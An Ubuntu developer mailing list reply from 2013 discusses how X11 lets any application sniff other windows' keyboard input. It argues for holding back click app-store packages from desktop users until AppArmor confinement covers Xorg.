ubuntu-appstore-developers team mailing list archive

[Jamie Strandboge <jamie@xxxxxxxxxxxxx>]

On 07/26/2013 03:07 AM, Rick Spencer wrote:
> AIUI it's not a matter of making click work with xorg, it's a matter
> of making app armour work with xorg so that we don't have to inspect
> each application by hand to ensure that it is not malicious. In other
> words, this is about application sandboxing, not about click.
> 
Yes, exactly. I probably wasn't as clear as I needed to be on this point. Click
itself is fine, it is application confinement that doesn't cover xorg at this time.

> Please, someone, correct me if I am wrong, but I think the situation
> is that it is trivial to write an application that looks at all x
> input events, even for application windows from other apps. As such, I
> can write an app that looks for something that looks like a credit
> card number being entered into a web browser (as one obvious example)
> and upload that data to my evil server.

Yes.

> We don't think this is a
> problem in the Ubuntu repositories today because we inspect each
> application to make sure they don't do such a thing.
> 
> However, we want to make it easier for application developers to get
> their apps to users by, among other things, making it difficult for
> malicious applications to do naughty things, and therefore minimizing
> the effort and time necessary for manually checking them. We can
> achieve this reduction in manual vetting only via tight sand-boxing
> for applications. With Mir, it is relatively easy, aiui, to use app
> armour to restrict an application from knowing about other application
> windows, and therefore denying them access to the input for those
> windows. With xorg, it is not easy to use app armour in such a manner.
> 
Yes - because there is no code review, a malicious app can try to do anything
without anyone knowing about it. If a malicious app is running on X, it can then
sniff keyboard events like in your credit card example. The Mir design doesn't
need (much) AppArmor integration. The X design requires considerable work to
plug things like sniffing keyboard events (though it can be done).

> So, the question is about whether we can/should plug the security hole
> in xorg, it's not really about click.
> 
That is the core question, yes. I was (expressing the opinion that because we
won't have X AppArmor mediation for 13.10, and because Unity 7 (which uses X)
won't be able to integrate with the app store and click yet anyway (per Martin
earlier in the thread), we should hold off on exposing app store click packages
to desktop users for now.

-- 
Jamie Strandboge                 http://www.ubuntu.com/

Attachment: signature.asc
Description: OpenPGP digital signature